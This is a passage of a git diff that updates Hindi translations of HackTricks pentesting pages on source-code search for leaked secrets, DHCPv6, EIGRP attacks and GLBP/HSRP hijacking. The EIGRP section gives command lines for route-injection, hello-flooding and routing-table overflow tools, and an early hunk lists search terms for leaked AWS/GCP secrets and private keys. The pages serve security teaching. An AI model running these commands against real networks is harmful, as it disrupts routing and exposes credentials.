जाने वाले प्लेटफॉर्म * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### गिथब में एपीआई कुंजी लीक्स +### गिटहब में एपीआई कुंजी लीक्स * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) @@ -321,16 +322,17 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 8694dad19..0982c1f24 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,57 +1,59 @@ -# Wide Source Code Search +# व्यापक स्रोत कोड खोज + +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें। -* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} **Try Hard सुरक्षा समूह** -
+
{% embed url="https://discord.gg/tryhardsecurity" %} *** -इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो हजारों/लाखों रेपो में कोड (शब्दांश या रीजेक्स) खोजने की अनुमति देती हैं**। +इस पृष्ठ का उद्देश्य है **प्लेटफॉर्मों की सूची बनाना जो कोड खोजने की अनुमति देती हैं** (शब्दांश या रेजेक्स) हजारों/लाखों रेपो में एक या अधिक प्लेटफॉर्मों पर। -यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **सुरक्षा दोष** पैटर्न्स की खोज करने में। +यह कई अवसरों में मदद करता है **लीक हुई जानकारी** या **कमजोरियों** के पैटर्न खोजने में। -* [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन की मुफ्त सेवा) है। यह रीजेक्स समर्थित करता है। -* [**Github खोज**](https://github.com/search): Github में खोजें। यह रीजेक्स समर्थित करता है। +* [**SourceGraph**](https://sourcegraph.com/search): मिलियनों रेपो में खोजें। एक मुफ्त संस्करण और एक एंटरप्राइज संस्करण (15 दिन का मुफ्त) है। यह रेजेक्स समर्थित करता है। +* [**Github खोज**](https://github.com/search): Github में खोजें। यह रेजेक्स समर्थित करता है। * शायद यह उपयोगी हो सकता है [**Github कोड खोज**](https://cs.github.com/) भी देखना। -* [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रीजेक्स समर्थित करता है। +* [**Gitlab उन्नत खोज**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Gitlab परियोजनाओं में खोजें। रेजेक्स समर्थित है। * [**SearchCode**](https://searchcode.com/): लाखों परियोजनाओं में कोड खोजें। {% hint style="warning" %} -जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाओं में अन्य कमिट्स** भी सीक्रेट्स को समेत सकते हैं! +जब आप किसी रेपो में लीक खोजते हैं और `git log -p` जैसी कुछ चलाते हैं, तो याद रखें कि **अन्य शाखाएं भी हो सकती हैं जिनमें अन्य कमिट्स** जो सीक्रेट्स रखते हैं! {% endhint %} **Try Hard सुरक्षा समूह** -
+
{% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें। -* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 48e7063d7..06080c58a 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} ### DHCPv6 vs. DHCPv4 संदेश प्रकार तुलना -DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य नीचे दिए गए तालिका में प्रस्तुत किया गया है: +नीचे दिए गए तालिका में DHCPv6 और DHCPv4 संदेश प्रकारों की तुलनात्मक दृश्य प्रस्तुत किया गया है: | DHCPv6 संदेश प्रकार | DHCPv4 संदेश प्रकार | |:-------------------|:-------------------| @@ -31,33 +32,34 @@ DHCPv6 और DHCPv4 संदेश प्रकारों की तुल **DHCPv6 संदेश प्रकारों का विस्तृत विवरण:** 1. **Solicit (1)**: DHCPv6 क्लाइंट द्वारा उपलब्ध सर्वरों को खोजने के लिए प्रारंभिक। -2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को सूचित करता है। +2. **Advertise (2)**: Solicit का प्रतिसाद में सर्वरों द्वारा भेजा गया, DHCP सेवा के लिए उपलब्धता को दर्शाता है। 3. **Request (3)**: ग्राहक इसका उपयोग विशिष्ट सर्वर से IP पते या प्रिफिक्स का अनुरोध करने के लिए करते हैं। -4. **Confirm (4)**: एक ग्राहक द्वारा उनके द्वारा नेटवर्क पर अभिगमन किए गए पतों की वैधता की पुष्टि करने के लिए उपयोग किया जाता है, सामान्यत: नेटवर्क परिवर्तन के बाद। +4. **Confirm (4)**: ग्राहक द्वारा उन्हें सौंपे गए पते अब भी नेटवर्क पर वैध हैं या नहीं यह सत्यापित करने के लिए उपयोग किया जाता है, आमतौर पर नेटवर्क परिवर्तन के बाद। 5. **Renew (5)**: ग्राहक मूल सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए इसे भेजते हैं। -6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक नवीनीकरण के बाद। -7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर, या रिलीज या डिक्लाइन जैसे संदेशों की पुष्टि करें। -8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक निर्धारित पतों का उपयोग बंद करने की सूचना देते हैं। -9. **Decline (9)**: ग्राहक द्वारा भेजा गया है कि नेटवर्क पर निर्धारित पते संघर्ष में हैं। -10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेट किए गए विन्यास के लिए लेन-देन आरंभ करने के लिए प्रोत्साहित करते हैं। -11. **Information-Request (11)**: ग्राहक आईपी पता निर्धारण के बिना विन्यास पैरामीटर अनुरोध करते हैं। +6. **Rebind (6)**: किसी भी सर्वर को पते की अवधि बढ़ाने या विन्यास अपडेट करने के लिए भेजा जाता है, विशेष रूप से जब कोई प्रतिक्रिया नहीं मिलती है एक रिन्यू को। +7. **Reply (7)**: सर्वर इसका उपयोग करते हैं ताकि पते, विन्यास पैरामीटर या रिलीज या डिक्लाइन जैसे संदेशों को स्वीकृति देने के लिए प्रदान करें। +8. **Release (8)**: ग्राहक सर्वर को एक या एक से अधिक सौंपे गए पतों का उपयोग बंद करने की सूचना देते हैं। +9. **Decline (9)**: ग्राहक द्वारा रिपोर्ट किया जाता है कि नेटवर्क पर सौंपे गए पते संघर्ष में हैं। +10. **Reconfigure (10)**: सर्वर ग्राहकों को नए या अपडेटेड विन्यास के लिए लेनदेन आरंभ करने के लिए प्रोत्साहित करते हैं। +11. **Information-Request (11)**: ग्राहक आईपी पता सौंपन के बिना विन्यास पैरामीटर अनुरोध करते हैं। 12. **Relay-Forw (12)**: रिले एजेंट संदेशों को सर्वरों को आगे भेजते हैं। -13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को उत्तर देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं। +13. **Relay-Repl (13)**: सर्वर रिले एजेंट्स को जवाब देते हैं, जो फिर मैसेज को ग्राहक को पहुंचाते हैं। ## संदर्भ * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 1dcb84e5f..da52322e8 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,52 +1,53 @@ # EIGRP हमले +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -**यह उन हमलों का सारांश है जो** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए हैं।** अधिक जानकारी के लिए इसे देखें। +**यह** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए हमलों का सारांश है। अधिक जानकारी के लिए इसे देखें।** ## **फेक EIGRP पड़ोसियों हमला** -- **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जो संभावित रूप से एक सेवा की असुरक्षितता (DoS) हमले तक जा सकता है। +- **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जिससे एक डिनायल ऑफ सर्विस (DoS) हमला हो सकता है। - **उपकरण**: **helloflooding.py** स्क्रिप्ट। - **अमल**: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%% - **पैरामीटर**: -- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे `eth0`। -- `--as`: EIGRP स्वतंत्र प्रणाली संख्या को परिभाषित करता है, जैसे `1`। -- `--subnet`: उपनेट स्थान को सेट करता है, जैसे `10.10.100.0/24`। +- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे, `eth0`। +- `--as`: EIGRP स्वतंत्र सिस्टम नंबर को परिभाषित करता है, जैसे, `1`। +- `--subnet`: सबनेट स्थान को सेट करता है, जैसे, `10.10.100.0/24`। ## **EIGRP ब्लैकहोल हमला** -- **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को विघटित करना, जिससे एक काले गड्ढे की ओर ले जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है। +- **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को व्यवस्थित करना, जिससे एक ब्लैकहोल बनाया जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है। - **उपकरण**: **routeinject.py** स्क्रिप्ट। - **अमल**: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%% - **पैरामीटर**: -- `--interface`: हमले करने वाले सिस्टम इंटरफेस को निर्दिष्ट करता है। -- `--as`: EIGRP AS संख्या को परिभाषित करता है। -- `--src`: हमले करने वाले का IP पता सेट करता है। +- `--interface`: हमलावर सिस्टम इंटरफेस को निर्दिष्ट करता है। +- `--as`: EIGRP AS नंबर को परिभाषित करता है। +- `--src`: हमलावर का IP पता सेट करता है। - `--dst`: लक्ष्य सबनेट IP को सेट करता है। - `--prefix`: लक्ष्य सबनेट IP का मास्क परिभाषित करता है। ## **K-मानों का दुरुपयोग हमला** -- **उद्देश्य**: संशोधित K-मानों को डालकर EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजन बनाना, जिससे एक सेवा की असुरक्षितता हमला हो। +- **उद्देश्य**: संशोधित K-मानों को इंजेक्ट करके EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजनाएं बनाना, जिससे एक DoS हमला हो। - **उपकरण**: **relationshipnightmare.py** स्क्रिप्ट। - **अमल**: %%%bash @@ -54,12 +55,12 @@ HackTricks का समर्थन करने के अन्य तरी %%% - **पैरामीटर**: - `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है। -- `--as`: EIGRP AS संख्या को परिभाषित करता है। +- `--as`: EIGRP AS नंबर को परिभाषित करता है। - `--src`: वैध राउटर का IP पता सेट करता है। ## **रूटिंग तालिका ओवरफ्लो हमला** -- **उद्देश्य**: राउटर की CPU और RAM को ताकत देने के लिए नकली रूटों से रूटिंग तालिका को भरना। +- **उद्देश्य**: नकली रूटों के साथ रूटर का CPU और RAM को तनाव देना। - **उपकरण**: **routingtableoverflow.py** स्क्रिप्ट। - **अमल**: %%%bash @@ -67,5 +68,21 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%% - **पैरामीटर**: - `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है। -- `--as`: EIGRP AS संख्या को परिभाषित करता है। -- `--src`: हमले करने वाले का IP पता सेट करता है। +- `--as`: EIGRP AS नंबर को परिभाषित करता है। +- `--src`: हमलावर का IP पता सेट करता है। + + +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +हैकट्रिक्स का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 8e70ba6ca..5d1d60a5e 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,64 +1,64 @@ # GLBP और HSRP हमले +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें। +* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %}
{% embed url="https://websec.nl/" %} - ## FHRP हाइजैकिंग अवलोकन ### FHRP में अंदरूनी दृष्टि -FHRP को नेटवर्क की मजबूती प्रदान करने के लिए डिज़ाइन किया गया है जिसमें कई राउटर्स को एक एकल आभासी इकाई में मिलाया जाता है, जिससे लोड वितरण और विफलता सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं। +FHRP का उद्देश्य नेटवर्क को मजबूती प्रदान करना है जिसे कई राउटरों को एक एकल आभासी इकाई में मिलाकर सुधारा जाता है, जिससे लोड वितरण और दोष सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं। ### GLBP प्रोटोकॉल की अंदरूनी दृष्टि -सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है जो पोर्ट 3222 पर होता है। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड के अंतराल पर आपस में विनिमय करते हैं। यदि किसी राउटर ने 10 सेकंड के लिए इन पैकेट्स को नहीं भेजा, तो उसे 